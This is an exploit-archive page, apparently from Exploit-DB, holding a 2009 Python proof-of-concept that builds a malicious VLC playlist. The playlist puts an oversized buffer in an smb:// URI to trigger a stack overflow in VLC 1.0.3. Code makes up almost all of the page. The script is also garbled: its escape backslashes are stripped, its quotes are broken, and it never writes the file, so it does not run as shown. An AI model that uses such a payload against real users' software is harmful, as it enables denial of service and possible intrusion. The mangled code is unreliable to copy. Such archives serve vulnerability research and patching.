[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
# Published : 2009-12-06
# Author : Dr_IDE
# Previous Title : Polipo 1.0.4 Remote Memory Corruption 0day PoC
# Next Title : VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)


#!/usr/bin/env python

######################################################################################################
#
# VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC
# Found By:	Dr_IDE
# Tested:	Windows 7
# Download:	http://www.videolan.org
# Note:		Open the .xspf file. It looks like nothing happens but close VLC you will get a crash
#
######################################################################################################

header1 =  ("<?xml version="1.0" encoding="UTF-8"?>n")
header1 += ("<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">n")
header1 += ("t<title>Playlist</title>n")
header1 += ("t<trackList>n")
header1 += ("tt<track>n")
header1 += ("ttt<location>smb://example.com@www.example.com/foo/#{")

payload = ("x41" * 2 + "x42" * 4 + "x43" * 10000)

header2 =  ("}</location>n");
header2 += ("ttt<extension application="http://www.videolan.org/vlc/playlist/0">n");
header2 += ("tttt<vlc:id>0</vlc:id>n");
header2 += ("ttt</extension>n");
header2 += ("tt</track>n");
header2 += ("t</trackList>n");
header2 += ("</playlist>n");